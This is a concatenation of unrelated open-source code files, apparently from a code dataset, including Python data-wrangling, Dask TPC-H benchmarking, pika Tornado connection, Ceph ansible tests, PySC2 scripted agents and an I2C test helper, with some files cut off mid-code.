df_ipo_ritter, 'Symbol', 'left') df_ipo = drop_columns_and_nans(df_ipo, ['IPO Name', 'Offer date', 'CUSIP', 'PERM'], ['CIK']) df_ipo.to_csv("../data/processed/df_ipo.csv", index=True) def main(): df_real_estate = load_real_estate_data('../data/raw/Zip_Zhvi_AllHomes.csv', 'State', 'CA') # data processing to load all IPO Data between 1997 and present data. 
This data has been scraped using code from src/web_scrapers.py df_ipo_list = load_data(['../data/processed/df_ipo.csv', '../data/raw/ipo_ritter_data.csv']) df_census_list = load_data(['../data/raw/zip_census_bureau_economic_characteristics_2017.csv', '../data/raw/zip_census_bureau_age_race_2017.csv']) zipcodes, zip_list = create_zipcode_list( ['../data/raw/Santa_Clara_County_Zipcodes.csv', '../data/raw/San_Mateo_County_Zipcodes.csv', '../data/raw/San_Francisco_County_Zipcodes.csv', '../data/raw/Alameda_County_Zipcodes.csv']) df_real_estate = wrangle_real_estate_data(df_real_estate, zip_list,['City', 'State', 'Metro', 'CountyName', 'SizeRank']) df_ipo = wrangle_IPO_data(df_ipo_list[0], zip_list) census_econ_columns = ['Zipcode', 'Unemployment Rate', 'Mean Travel Time to Work Estimate (minutes)', 'Percent of Households with Income Greater than $200,000', 'Median Household Income Estimate (dollars)', 'Mean Household Income Estimate (dollars)', 'Per Capita Income Estimate (dollars)', 'Percent of Population with no Health Insurance Coverage', 'Percent of People whose Income in the Past 12 months has been Below Poverty Level', 'Percent of Households With Income Less Than $24,999'] census_dem_columns = ['Zipcode', 'Median Age', 'Percent of People under 18 years of age', 'Percent of People 65 years and over', 'Percent of Males', 'Percent of Females', 'Percent of People who are Hispanic', 'Percent of People who are White', 'Percent of People who are Black or African American', 'Percent of People who are Asian'] df_census_econ, df_census_dem = wrangle_census_data(df_census_list[0], df_census_list[1], zip_list, census_econ_columns, census_dem_columns) df_real_estate = wrangle_real_estate_headers(df_real_estate) df_ipo_ritter = wrangle_ipo_headers(df_ipo_list[1]) df_ipo_ritter = df_ipo_ritter.drop(['Found'], axis=1) df_census = join_data(df_census_econ, df_census_dem, 'Zipcode', 'inner') df_zip = merge_data(df_census, df_real_estate, 'Zipcode') df_zip = df_replace(df_zip, ['\+', '\,']) print(df_zip['All Homes 2019-05']) df_ipo = join_data(df_ipo, df_ipo_ritter, 'Symbol', 'left') df_ipo = drop_columns_and_nans(df_ipo, ['IPO Name', 'Offer date', 'CUSIP', 'PERM'], ['CIK']) df_ipo['Found'] = 2019.0 - df_ipo['Found'] normalization_list = ['Offer Amount', 'Number of Employees', 'Found', 'Median Age', 'Percent of People under 18 years of age', 'Percent of People 65 years and over', 'Percent of Males', 'Percent of Females', 'Percent of People who are Hispanic', 'Percent of People who are White', 'Percent of People who are Black or African American', 'Percent of People who are Asian', 'Unemployment Rate', 'Mean Travel Time to Work Estimate (minutes)', 'Percent of Households with Income Greater than $200,000', 'Median Household Income Estimate (dollars)', 'Mean Household Income Estimate (dollars)', 'Per Capita Income Estimate (dollars)', 'Percent of Population with no Health Insurance Coverage', 'Percent of People whose Income in the Past 12 months has been Below Poverty Level', 'Percent of Households With Income Less Than $24,999'] zipcodes = update_zipcodes_dict(zipcodes, zip_list) df_ipo_all = create_IPO_an_Zipcode_dataframe(census_econ_columns, census_dem_columns, df_ipo, df_zip, zipcodes) df_ipo_all.to_csv("../data/processed/df_ipo_all.csv", index=False) if __name__ == "__main__": print("we are wrangling data") #update_ipo_list(2019, 6, 7) main()
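# ---------------------------------------------------------------------------
# Illustrative sketch (an addition; not called anywhere above): the loop in
# create_IPO_an_Zipcode_dataframe assigns 'Distance to IPO' weights of 0.2
# (same zipcode), 0.5 (within 5 miles) and 1 (5 to 10 miles).  The helper name
# below is hypothetical and only restates that mapping in one place.
def distance_weight(ipo_zipcode, other_zipcode, zipcodes):
    if other_zipcode == ipo_zipcode:
        return 0.2
    within_5miles, within_10miles = zipcodes.get(ipo_zipcode, ([], []))
    if other_zipcode in within_5miles:
        return 0.5
    if other_zipcode in within_10miles:
        return 1.0
    return None  # farther than 10 miles from the IPO zipcode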
2.96875
3
src/python/director/builtin/plugins/measurement_tool/plugin.py
afdaniele/director
0
11861
from director.devel.plugin import GenericPlugin from director.fieldcontainer import FieldContainer from .lib import measurementpanel from PythonQt import QtCore class Plugin(GenericPlugin): ID = 'measurement_tool' NAME = 'MeasurementTool' DEPENDENCIES = ['MainWindow'] def __init__(self, app, view): super(Plugin, self).__init__(app, view) def init(self, fields): measurementPanel = measurementpanel.MeasurementPanel(self.app, self.view) measurementDock = self.app.addWidgetToDock( measurementPanel.widget, QtCore.Qt.RightDockWidgetArea, visible=False ) # --- return FieldContainer( measurementToolPanel=measurementPanel, measurementToolDock=measurementDock )
1.945313
2
jupyter_book/yaml.py
akhmerov/jupyter-book
1
11862
<gh_stars>1-10 """A small sphinx extension to let you configure a site with YAML metadata.""" from pathlib import Path # Transform a "Jupyter Book" YAML configuration file into a Sphinx configuration file. # This is so that we can choose more user-friendly words for things than Sphinx uses. # e.g., 'logo' instead of 'html_logo'. # Note that this should only be used for **top level** keys. PATH_YAML_DEFAULT = Path(__file__).parent.joinpath("default_config.yml") def yaml_to_sphinx(yaml): """Convert a Jupyter Book style config structure into a Sphinx config dict.""" sphinx_config = { "exclude_patterns": [ "_build", "Thumbs.db", ".DS_Store", "**.ipynb_checkpoints", ], } # Start with an empty options block theme_options = {} # Launch button configuration launch_buttons_config = yaml.get("launch_buttons", {}) repository_config = yaml.get("repository", {}) theme_options["launch_buttons"] = launch_buttons_config theme_options["path_to_docs"] = repository_config.get("path_to_book", "") theme_options["repository_url"] = repository_config.get("url", "") theme_options["repository_branch"] = repository_config.get("branch", "") # HTML html = yaml.get("html") if html: sphinx_config["html_favicon"] = html.get("favicon", "") sphinx_config["html_baseurl"] = html.get("baseurl", "") theme_options["google_analytics_id"] = html.get("google_analytics_id", "") # Deprecate navbar_footer_text after a release cycle theme_options["navbar_footer_text"] = html.get("navbar_footer_text", "") theme_options["extra_navbar"] = html.get("extra_navbar", "") theme_options["extra_footer"] = html.get("extra_footer", "") theme_options["home_page_in_toc"] = html.get("home_page_in_navbar") # Comments config sphinx_config["comments_config"] = html.get("comments", {}) # Pass through the buttons btns = ["use_repository_button", "use_edit_page_button", "use_issues_button"] use_buttons = {btn: html.get(btn) for btn in btns if html.get(btn) is not None} if any(use_buttons.values()): if not repository_config.get("url"): raise ValueError( "To use 'repository' buttons, you must specify the repository URL" ) # Update our config theme_options.update(use_buttons) # Update the theme options in the main config sphinx_config["html_theme_options"] = theme_options execute = yaml.get("execute") if execute: if execute.get("execute_notebooks") is False: # Special case because YAML treats `off` as "False". 
execute["execute_notebooks"] = "off" sphinx_config["jupyter_execute_notebooks"] = execute.get( "execute_notebooks", "auto" ) sphinx_config["execution_timeout"] = execute.get("timeout", 30) sphinx_config["jupyter_cache"] = execute.get("cache", "") _recursive_update( sphinx_config, {"execution_excludepatterns": execute.get("exclude_patterns", [])}, ) # LaTeX latex = yaml.get("latex") if latex: sphinx_config["latex_engine"] = latex.get("latex_engine", "pdflatex") # Extra extensions extra_extensions = yaml.get("sphinx", {}).get("extra_extensions") if extra_extensions: if not isinstance(extra_extensions, list): extra_extensions = [extra_extensions] extensions = sphinx_config.get("extensions", []) for extra in extra_extensions: extensions.append(extra) sphinx_config["extensions"] = extensions # Files that we wish to skip sphinx_config["exclude_patterns"].extend(yaml.get("exclude_patterns", [])) # Now do simple top-level translations YAML_TRANSLATIONS = { "logo": "html_logo", "title": "html_title", "execute_notebooks": "jupyter_execute_notebooks", "project": "project", "author": "author", "copyright": "copyright", } for key, newkey in YAML_TRANSLATIONS.items(): if key in yaml: val = yaml.get(key) if val is None: val = "" sphinx_config[newkey] = val return sphinx_config def _recursive_update(config, update): """Update the dict `config` with `update` recursively. This *updates* nested dicts / lists instead of replacing them. """ for key, val in update.items(): if isinstance(config.get(key), dict): config[key].update(val) elif isinstance(config.get(key), list): if isinstance(val, list): config[key].extend(val) else: config[key] = val else: config[key] = val
2.609375
3
ScriptedAgent.py
RaphaelRoyerRivard/Supervised-End-to-end-Weight-sharing-for-StarCraft-II
0
11863
__author__ = '<NAME> - www.tonybeltramelli.com' # scripted agents taken from PySC2, credits to DeepMind # https://github.com/deepmind/pysc2/blob/master/pysc2/agents/scripted_agent.py import numpy as np import uuid from pysc2.agents import base_agent from pysc2.lib import actions from pysc2.lib import features _SCREEN_PLAYER_RELATIVE = features.SCREEN_FEATURES.player_relative.index _SCREEN_SELECTED = features.SCREEN_FEATURES.selected.index _PLAYER_FRIENDLY = 1 _PLAYER_NEUTRAL = 3 _PLAYER_HOSTILE = 4 _NO_OP = actions.FUNCTIONS.no_op.id _MOVE_SCREEN = actions.FUNCTIONS.Move_screen.id _ATTACK_SCREEN = actions.FUNCTIONS.Attack_screen.id _SELECT_ARMY = actions.FUNCTIONS.select_army.id _NOT_QUEUED = [0] _SELECT_ALL = [0] class ScriptedAgent(base_agent.BaseAgent): def step(self, obs): super(ScriptedAgent, self).step(obs) # we expand dims because keras wants 4 dims for convolutions # observation = np.expand_dims(obs.observation["screen"][_SCREEN_PLAYER_RELATIVE], axis=3) screens = [obs.observation["screen"][_SCREEN_PLAYER_RELATIVE], obs.observation["screen"][_SCREEN_SELECTED]] observation = np.stack(screens, axis=2) if self.game == "beacon": if actions.FUNCTIONS.Move_screen.id in obs.observation["available_actions"]: player_relative = obs.observation["screen"][_SCREEN_PLAYER_RELATIVE] neutral_y, neutral_x = (player_relative == 3).nonzero() if not neutral_y.any(): action = _NO_OP params = [] else: target = [int(neutral_x.mean()), int(neutral_y.mean())] action = _MOVE_SCREEN params = [[0], target] else: action = _SELECT_ARMY params = [[0]] elif self.game == "mineral": if actions.FUNCTIONS.Move_screen.id in obs.observation["available_actions"]: player_relative = obs.observation["screen"][_SCREEN_PLAYER_RELATIVE] neutral_y, neutral_x = (player_relative == 3).nonzero() player_y, player_x = (player_relative == 1).nonzero() if not neutral_y.any() or not player_y.any(): action = _NO_OP params = [] else: action = _MOVE_SCREEN index_x = np.argmin(neutral_x) index_y = np.argmin(neutral_y) index = index_x if neutral_x[index_x] + neutral_y[index_x] < neutral_x[index_y] + neutral_y[index_y] else index_y target = [neutral_x[index], neutral_y[index]] params = [[0], target] else: action = _SELECT_ARMY params = [[0]] elif self.game == "minerals": if actions.FUNCTIONS.Move_screen.id in obs.observation["available_actions"]: player_relative = obs.observation["screen"][_SCREEN_PLAYER_RELATIVE] neutral_y, neutral_x = (player_relative == 3).nonzero() player_y, player_x = (player_relative == 1).nonzero() if not neutral_y.any() or not player_y.any(): action = _NO_OP params = [] else: player = [int(player_x.mean()), int(player_y.mean())] closest, min_dist = None, None for p in zip(neutral_x, neutral_y): dist = np.linalg.norm(np.array(player) - np.array(p)) if not min_dist or dist < min_dist: closest, min_dist = p, dist action = _MOVE_SCREEN params = [[0], closest] else: action = _SELECT_ARMY params = [[0]] elif self.game == "roaches": if _ATTACK_SCREEN in obs.observation["available_actions"]: player_relative = obs.observation["screen"][_SCREEN_PLAYER_RELATIVE] roach_y, roach_x = (player_relative == _PLAYER_HOSTILE).nonzero() if not roach_y.any(): action = _NO_OP params = [_NOT_QUEUED] else: index = np.argmax(roach_y) target = [roach_x[index], roach_y[index]] action = _ATTACK_SCREEN params = [_NOT_QUEUED, target] elif _SELECT_ARMY in obs.observation["available_actions"]: action = _SELECT_ARMY params = [_SELECT_ALL] else: action = _NO_OP params = [_NOT_QUEUED] self.states.append(np.array([observation, 
obs.observation["available_actions"], action, params])) if len(self.states) == 64: new_file_name = str(uuid.uuid1()) np.save("dataset_{}/{}".format(self.game, new_file_name), np.array(self.states)) self.states = [] return actions.FunctionCall(action, params) class AgentRoaches(ScriptedAgent): def __init__(self): base_agent.BaseAgent.__init__(self) self.game = "roaches" self.states = [] class AgentBeacon(ScriptedAgent): def __init__(self): base_agent.BaseAgent.__init__(self) self.game = "beacon" self.states = [] class AgentMineral(ScriptedAgent): def __init__(self): base_agent.BaseAgent.__init__(self) self.game = "mineral" self.states = [] class AgentMinerals(ScriptedAgent): def __init__(self): base_agent.BaseAgent.__init__(self) self.game = "minerals" self.states = []
2.46875
2
benchmark/test_tpch.py
serverless-analytics/dask-distributed-vanilla
0
11864
import time import sys import dask from dask.distributed import ( wait, futures_of, Client, ) from tpch import loaddata, queries #from benchmarks import utils # Paths or URLs to the TPC-H tables. #table_paths = { # 'CUSTOMER': 'hdfs://bu-23-115:9000/tpch/customer.tbl', # 'LINEITEM': 'hdfs://bu-23-115:9000/tpch/lineitem.tbl', # 'NATION': 'hdfs://bu-23-115:9000/tpch/nation.tbl', # 'ORDERS': 'hdfs://bu-23-115:9000/tpch/orders.tbl', # 'PART': 'hdfs://bu-23-115:9000/tpch/part.tbl', # 'PARTSUPP': 'hdfs://bu-23-115:9000/tpch/partsupp.tbl', # 'REGION': 'hdfs://bu-23-115:9000/tpch/region.tbl', # 'SUPPLIER': 'hdfs://bu-23-115:9000/tpch/supplier.tbl', #} table_paths = { 'CUSTOMER': '/root/2g/customer.tbl', 'LINEITEM': '/root/2g/lineitem.tbl', 'NATION': '/root/2g/nation.tbl', 'ORDERS': '/root/2g/orders.tbl', 'PART': '/root/2g/part.tbl', 'PARTSUPP': '/root/2g/partsupp.tbl', 'REGION': '/root/2g/region.tbl', 'SUPPLIER': '/root/2g/supplier.tbl', } #table_paths = { # 'CUSTOMER': 'https://gochaudhstorage001.blob.core.windows.net/tpch/customer.tbl', # 'LINEITEM': 'https://gochaudhstorage001.blob.core.windows.net/tpch/lineitem.tbl', # 'NATION': 'https://gochaudhstorage001.blob.core.windows.net/tpch/nation.tbl', # 'ORDERS': 'https://gochaudhstorage001.blob.core.windows.net/tpch/orders.tbl', # 'PART': 'https://gochaudhstorage001.blob.core.windows.net/tpch/part.tbl', # 'PARTSUPP': 'https://gochaudhstorage001.blob.core.windows.net/tpch/partsupp.tbl', # 'REGION': 'https://gochaudhstorage001.blob.core.windows.net/tpch/region.tbl', # 'SUPPLIER': 'https://gochaudhstorage001.blob.core.windows.net/tpch/supplier.tbl', #} def main(): if len(sys.argv) < 2: print("args: <dask client>") return 1 client = Client(sys.argv[1]) timing_supported = False # set to False if running against upstream dask without our code changes. benchmarker = TpchBenchmarkManager(client, timing_supported) benchmarker.load_tables( part_path = table_paths['PART'], supplier_path = table_paths['SUPPLIER'], partsupp_path = table_paths['PARTSUPP'], customer_path = table_paths['CUSTOMER'], orders_path = table_paths['ORDERS'], lineitem_path = table_paths['LINEITEM'], nation_path = table_paths['NATION'], region_path = table_paths['REGION'], ) # Choose what queries you want to run here. benchmarker.run_query(1) #benchmarker.run_query(3) #benchmarker.run_query(6) #benchmarker.run_query(21) class TpchBenchmarkManager: def __init__(self, client, timing_supported=True): self.client = client self.timing_supported = timing_supported self.tables = {} def load_tables(self, *, # Paths/URLs for TPCH tables source data. part_path=None, supplier_path=None, partsupp_path=None, customer_path=None, orders_path=None, lineitem_path=None, nation_path=None, region_path=None, ): paths = { 'PART': part_path, 'SUPPLIER': supplier_path, 'PARTSUPP': partsupp_path, 'CUSTOMER': customer_path, 'ORDERS': orders_path, 'LINEITEM': lineitem_path, 'NATION': nation_path, 'REGION': region_path, } for tablename, path in paths.items(): if path is None: print("\nNo path given for table {}. Skipping.".format(tablename)) continue print("\n====================================") print("Ingesting table {}... \n(from {})".format(tablename, path)) load_start = time.time() table = loaddata.loader[tablename](path) #table = self.client.persist(table) #wait(table) load_duration = time.time() - load_start self.tables[tablename] = table futures = futures_of(table) print("...complete.") print("\nE2E time: {:.3f} seconds. 
Number of partitions: {}".format( load_duration, len(futures))) print("====================================\n") if self.timing_supported: longest_future = None longest_future_duration = None for future in futures: duration = self.client.timing_info(future)[0]['duration'] if longest_future is None or duration > longest_future_duration: longest_future = future longest_future_duration = duration print("Profile of slowest partition:") #utils.prettyprint_timing_info(self.client.timing_info(longest_future)) def run_query(self, query_num): print("\n====================================") print("Executing query {}...".format(query_num)) query_start = time.time() futures = queries.by_number[query_num](self.tables) future = self.client.compute(futures) result = self.client.gather(future) query_duration = time.time() - query_start print("...complete.") print("\nE2E time: {:.3f} seconds.".format(query_duration)) if self.timing_supported: try: utils.prettyprint_timing_info(self.client.timing_info(future)) except Exception as e: print(str(e)) print(result) return future if __name__ == '__main__': main()
2.046875
2
pika/adapters/tornado_connection.py
hugovk/pika
1
11865
"""Use pika with the Tornado IOLoop """ import logging from tornado import ioloop from pika.adapters.utils import nbio_interface, selector_ioloop_adapter from pika.adapters import base_connection LOGGER = logging.getLogger(__name__) class TornadoConnection(base_connection.BaseConnection): """The TornadoConnection runs on the Tornado IOLoop. """ def __init__(self, parameters=None, on_open_callback=None, on_open_error_callback=None, on_close_callback=None, custom_ioloop=None, internal_connection_workflow=True): """Create a new instance of the TornadoConnection class, connecting to RabbitMQ automatically :param pika.connection.Parameters parameters: Connection parameters :param on_open_callback: The method to call when the connection is open :type on_open_callback: method :param None | method on_open_error_callback: Called if the connection can't be established or connection establishment is interrupted by `Connection.close()`: on_open_error_callback(Connection, exception). :param None | method on_close_callback: Called when a previously fully open connection is closed: `on_close_callback(Connection, exception)`, where `exception` is either an instance of `exceptions.ConnectionClosed` if closed by user or broker or exception of another type that describes the cause of connection failure. :param None | ioloop.IOLoop | nbio_interface.AbstractIOServices custom_ioloop: Override using the global IOLoop in Tornado :param bool internal_connection_workflow: True for autonomous connection establishment which is default; False for externally-managed connection workflow via the `create_connection()` factory. """ if isinstance(custom_ioloop, nbio_interface.AbstractIOServices): nbio = custom_ioloop else: nbio = ( selector_ioloop_adapter.SelectorIOServicesAdapter( custom_ioloop or ioloop.IOLoop.instance())) super(TornadoConnection, self).__init__( parameters, on_open_callback, on_open_error_callback, on_close_callback, nbio, internal_connection_workflow=internal_connection_workflow) @classmethod def create_connection(cls, connection_configs, on_done, custom_ioloop=None, workflow=None): """Implement :py:classmethod:`pika.adapters.BaseConnection.create_connection()`. """ nbio = selector_ioloop_adapter.SelectorIOServicesAdapter( custom_ioloop or ioloop.IOLoop.instance()) def connection_factory(params): """Connection factory.""" if params is None: raise ValueError('Expected pika.connection.Parameters ' 'instance, but got None in params arg.') return cls( parameters=params, custom_ioloop=nbio, internal_connection_workflow=False) return cls._start_connection_workflow( connection_configs=connection_configs, connection_factory=connection_factory, nbio=nbio, workflow=workflow, on_done=on_done)
2.484375
2
tests/library/test_ceph_volume_simple_activate.py
u-kosmonaft-u/ceph-ansible
1,570
11866
from mock.mock import patch import os import pytest import ca_test_common import ceph_volume_simple_activate fake_cluster = 'ceph' fake_container_binary = 'podman' fake_container_image = 'quay.ceph.io/ceph/daemon:latest' fake_id = '42' fake_uuid = '0c4a7eca-0c2a-4c12-beff-08a80f064c52' fake_path = '/etc/ceph/osd/{}-{}.json'.format(fake_id, fake_uuid) class TestCephVolumeSimpleActivateModule(object): @patch('ansible.module_utils.basic.AnsibleModule.exit_json') def test_with_check_mode(self, m_exit_json): ca_test_common.set_module_args({ 'osd_id': fake_id, 'osd_fsid': fake_uuid, '_ansible_check_mode': True }) m_exit_json.side_effect = ca_test_common.exit_json with pytest.raises(ca_test_common.AnsibleExitJson) as result: ceph_volume_simple_activate.main() result = result.value.args[0] assert not result['changed'] assert result['cmd'] == ['ceph-volume', '--cluster', fake_cluster, 'simple', 'activate', fake_id, fake_uuid] assert result['rc'] == 0 assert not result['stdout'] assert not result['stderr'] @patch('ansible.module_utils.basic.AnsibleModule.exit_json') @patch('ansible.module_utils.basic.AnsibleModule.run_command') def test_with_failure(self, m_run_command, m_exit_json): ca_test_common.set_module_args({ 'osd_id': fake_id, 'osd_fsid': fake_uuid }) m_exit_json.side_effect = ca_test_common.exit_json stdout = '' stderr = 'error' rc = 2 m_run_command.return_value = rc, stdout, stderr with pytest.raises(ca_test_common.AnsibleExitJson) as result: ceph_volume_simple_activate.main() result = result.value.args[0] assert result['changed'] assert result['cmd'] == ['ceph-volume', '--cluster', fake_cluster, 'simple', 'activate', fake_id, fake_uuid] assert result['rc'] == rc assert result['stderr'] == stderr @patch('ansible.module_utils.basic.AnsibleModule.exit_json') @patch('ansible.module_utils.basic.AnsibleModule.run_command') def test_activate_all_osds(self, m_run_command, m_exit_json): ca_test_common.set_module_args({ 'osd_all': True }) m_exit_json.side_effect = ca_test_common.exit_json stdout = '' stderr = '' rc = 0 m_run_command.return_value = rc, stdout, stderr with pytest.raises(ca_test_common.AnsibleExitJson) as result: ceph_volume_simple_activate.main() result = result.value.args[0] assert result['changed'] assert result['cmd'] == ['ceph-volume', '--cluster', fake_cluster, 'simple', 'activate', '--all'] assert result['rc'] == rc assert result['stderr'] == stderr assert result['stdout'] == stdout @patch.object(os.path, 'exists', return_value=True) @patch('ansible.module_utils.basic.AnsibleModule.exit_json') @patch('ansible.module_utils.basic.AnsibleModule.run_command') def test_activate_path_exists(self, m_run_command, m_exit_json, m_os_path): ca_test_common.set_module_args({ 'path': fake_path }) m_exit_json.side_effect = ca_test_common.exit_json stdout = '' stderr = '' rc = 0 m_run_command.return_value = rc, stdout, stderr with pytest.raises(ca_test_common.AnsibleExitJson) as result: ceph_volume_simple_activate.main() result = result.value.args[0] assert result['changed'] assert result['cmd'] == ['ceph-volume', '--cluster', fake_cluster, 'simple', 'activate', '--file', fake_path] assert result['rc'] == rc assert result['stderr'] == stderr assert result['stdout'] == stdout @patch.object(os.path, 'exists', return_value=False) @patch('ansible.module_utils.basic.AnsibleModule.fail_json') def test_activate_path_not_exists(self, m_fail_json, m_os_path): ca_test_common.set_module_args({ 'path': fake_path }) m_fail_json.side_effect = ca_test_common.fail_json with 
pytest.raises(ca_test_common.AnsibleFailJson) as result: ceph_volume_simple_activate.main() result = result.value.args[0] assert result['msg'] == '{} does not exist'.format(fake_path) assert result['rc'] == 1 @patch('ansible.module_utils.basic.AnsibleModule.exit_json') @patch('ansible.module_utils.basic.AnsibleModule.run_command') def test_activate_without_systemd(self, m_run_command, m_exit_json): ca_test_common.set_module_args({ 'osd_id': fake_id, 'osd_fsid': fake_uuid, 'systemd': False }) m_exit_json.side_effect = ca_test_common.exit_json stdout = '' stderr = '' rc = 0 m_run_command.return_value = rc, stdout, stderr with pytest.raises(ca_test_common.AnsibleExitJson) as result: ceph_volume_simple_activate.main() result = result.value.args[0] assert result['changed'] assert result['cmd'] == ['ceph-volume', '--cluster', fake_cluster, 'simple', 'activate', fake_id, fake_uuid, '--no-systemd'] assert result['rc'] == rc assert result['stderr'] == stderr assert result['stdout'] == stdout @patch.dict(os.environ, {'CEPH_CONTAINER_BINARY': fake_container_binary}) @patch.dict(os.environ, {'CEPH_CONTAINER_IMAGE': fake_container_image}) @patch('ansible.module_utils.basic.AnsibleModule.exit_json') @patch('ansible.module_utils.basic.AnsibleModule.run_command') def test_activate_with_container(self, m_run_command, m_exit_json): ca_test_common.set_module_args({ 'osd_id': fake_id, 'osd_fsid': fake_uuid, }) m_exit_json.side_effect = ca_test_common.exit_json stdout = '' stderr = '' rc = 0 m_run_command.return_value = rc, stdout, stderr with pytest.raises(ca_test_common.AnsibleExitJson) as result: ceph_volume_simple_activate.main() result = result.value.args[0] assert result['changed'] assert result['cmd'] == [fake_container_binary, 'run', '--rm', '--privileged', '--ipc=host', '--net=host', '-v', '/etc/ceph:/etc/ceph:z', '-v', '/var/lib/ceph/:/var/lib/ceph/:z', '-v', '/var/log/ceph/:/var/log/ceph/:z', '-v', '/run/lvm/:/run/lvm/', '-v', '/run/lock/lvm/:/run/lock/lvm/', '--entrypoint=ceph-volume', fake_container_image, '--cluster', fake_cluster, 'simple', 'activate', fake_id, fake_uuid] assert result['rc'] == rc assert result['stderr'] == stderr assert result['stdout'] == stdout
1.945313
2
setup.py
Minterious/minter-monitoring
2
11867
import setuptools setuptools.setup( name='mintermonitoring', version='1.0.0', packages=setuptools.find_packages(include=['mintermonitoring']) )
1.171875
1
Python/Back_solve_python/back_joon/StringArray/P10808.py
skyriv213/Studyriv
0
11868
<reponame>skyriv213/Studyriv
s = input()
num = [0] * 26
for i in range(len(s)):
    num[ord(s[i]) - 97] += 1
for count in num:
    print(count, end=" ")
print()
3.328125
3
src/reliefcpp/utils.py
ferrocactus/reliefcpp
0
11869
<gh_stars>0
from enum import Enum


class Metric(Enum):
    EUCLIDEAN = 0
    MANHATTAN = 1
    HAMMING = 2
    L2 = 3
    L1 = 4


metric_names = [
    "euclidean",
    "manhattan",
    "hamming",
    "l2",
    "l1"
]


def _validate_metric(metric_name):
    if isinstance(metric_name, Metric):
        return metric_name.value
    elif isinstance(metric_name, str):
        metric_name = metric_name.lower()
        return metric_names.index(metric_name)
    elif isinstance(metric_name, int):
        return metric_name
    else:
        raise ValueError("Could not identify metric.")
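# ---------------------------------------------------------------------------
# Illustrative usage (an addition, not part of the original module):
# _validate_metric accepts a Metric member, a case-insensitive name, or an
# integer index, and always returns the integer index.
if __name__ == "__main__":
    assert _validate_metric(Metric.MANHATTAN) == 1
    assert _validate_metric("Euclidean") == 0
    assert _validate_metric(4) == 4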
3.140625
3
utilityFiles/createValidationDatasetFromXYTrainWithCandidates.py
jmfinelli/JavaNeuralDecompiler
1
11870
import pandas as pd import os.path length_switch = True max_body_length = 50 process_candidates = os.path.exists('./datasets/candidates.output') x_train = open('./datasets/x_train').readlines() x_train = [x.rstrip('\n') for x in x_train] y_train = open('./datasets/y_train').readlines() y_train = [x.rstrip('\n') for x in y_train] x_valid = open('./datasets/x_valid').readlines() x_valid = [x.rstrip('\n') for x in x_valid] y_valid = open('./datasets/y_valid').readlines() y_valid = [x.rstrip('\n') for x in y_valid] bytecodes = open('./datasets/bytecode.output').readlines() bytecodes = [x.rstrip('\n') for x in bytecodes] references = open('./datasets/references.output').readlines() references = [x.rstrip('\n') for x in references] if (process_candidates): candidates = open('./datasets/candidates.output').readlines() candidates = [x.rstrip('\n') for x in candidates] df_pairs = pd.DataFrame({'source': bytecodes, 'target' : references, 'candidates': candidates }) else: df_pairs = pd.DataFrame({'source': bytecodes, 'target': references }) if (length_switch): mask = df_pairs['source'].apply(lambda x: len(x.split()) <= max_body_length) df_pairs = df_pairs.loc[mask] df_train = pd.DataFrame({'source': x_train + x_valid, 'target' : y_train + y_valid }) df_valid = df_pairs.merge(df_train, on='source', indicator=True, how='left')\ .query('_merge=="left_only"')\ .drop('_merge', axis=1)\ .drop('target_y', axis=1) # df_valid = df_valid.sample(frac=1).reset_index(drop=True).sample(50000) with open('./datasets/remaining_sources', 'w') as filehandle: filehandle.writelines("%s\n" % place for place in df_valid['source']) with open('./datasets/remaining_references', 'w') as filehandle: filehandle.writelines("%s\n" % place for place in df_valid['target_x']) if (process_candidates): with open('./datasets/remaining_candidates', 'w') as filehandle: filehandle.writelines("%s\n" % place for place in df_valid['candidates'])
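# ---------------------------------------------------------------------------
# Illustrative sketch (an addition; not called by the script above): the
# merge(..., indicator=True).query('_merge=="left_only"') pattern used to build
# df_valid is a pandas anti-join, i.e. keep the rows of the left frame whose
# 'source' never appears in the right frame.  A tiny standalone version:
def _anti_join_demo():
    left = pd.DataFrame({'source': ['a', 'b', 'c'], 'target': [1, 2, 3]})
    right = pd.DataFrame({'source': ['b'], 'target': [2]})
    return left.merge(right, on='source', indicator=True, how='left') \
               .query('_merge == "left_only"') \
               .drop('_merge', axis=1)  # keeps the rows for 'a' and 'c'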
2.375
2
py/Utility.GetData.py
mathematicalmichael/SpringNodes
51
11871
import System dataKey, _ = IN OUT = System.AppDomain.CurrentDomain.GetData("_Dyn_Wireless_%s" % dataKey)
1.289063
1
codes_/1189_Maximum_Number_of_Balloons.py
SaitoTsutomu/leetcode
0
11872
<reponame>SaitoTsutomu/leetcode
# %% [1189. *Maximum Number of Balloons](https://leetcode.com/problems/maximum-number-of-balloons/)
# Problem: return how many times the word 'balloon' can be formed from the letters of text
# Approach: use collections.Counter
import collections


class Solution:
    def maxNumberOfBalloons(self, text: str) -> int:
        c = collections.Counter(text)
        return min(c[s] // n for s, n in collections.Counter("balloon").items())
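# ---------------------------------------------------------------------------
# Illustrative check (an addition to the original snippet), using sample inputs
# from the problem statement: "loonbalxballpoon" contains the letters of
# "balloon" twice, while "leetcode" has no 'b' at all.
if __name__ == "__main__":
    assert Solution().maxNumberOfBalloons("loonbalxballpoon") == 2
    assert Solution().maxNumberOfBalloons("leetcode") == 0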
3.578125
4
src/Quiet.X.Tests/i2c_test.py
callwyat/Quiet-Firmware
0
11873
from quiet_coms import find_quiet_ports from quiet import Quiet import time if 'EXIT_ON_FAIL' not in locals(): VERBOSE = True EXIT_ON_FAIL = True class QuietI2C(Quiet): def __init__(self, coms, **kargs) -> None: Quiet.__init__(self, coms, **kargs) def raw_write(self, addr: int, data: bytearray): command = f'IIC:ADDR {addr};WRIT' self.writeIEEE(command, data) def raw_read(self, addr: int, readCount: int) -> bytearray: message = f'IIC:ADDR {addr};READ? {readCount}' return self.queryIEEE(message) def register_write(self, address: int, register:int, data: int, dataSize=2): self.write(f'IIC:ADDR {address};REGI:ADDR {register};RSIZ {dataSize};WRIT {data}') def register_read(self, address: int, register:int, dataSize=1) -> int: return self.query_int(f'IIC:ADDR {address};REGI:ADDR {register};RSIZ {dataSize};READ?') def enable_master_mode(self) -> None: self.set_and_verify('IIC:MODE', 'MAST') def disable(self) -> None: self.set_and_verify('IIC:MODE', 'OFF') def acknowledged(self) -> bool: ack = self.query('IIC:ACK?') return '1' in ack def _i2c_register_read_test(i: QuietI2C, address:int, register:int, expectation:int): value = i.register_read(address, register, 2) if value != expectation: message = f'Failure at {hex(address)}:{hex(register)}. Expected {hex(expectation)} but read {hex(value)}' if EXIT_ON_FAIL: raise Exception() else: print(message) elif VERBOSE: print(f'REG\t{hex(address)}:{hex(register)} -> {hex(value)}') def _i2c_register_write_test(i: QuietI2C, address:int, register:int, value:int): 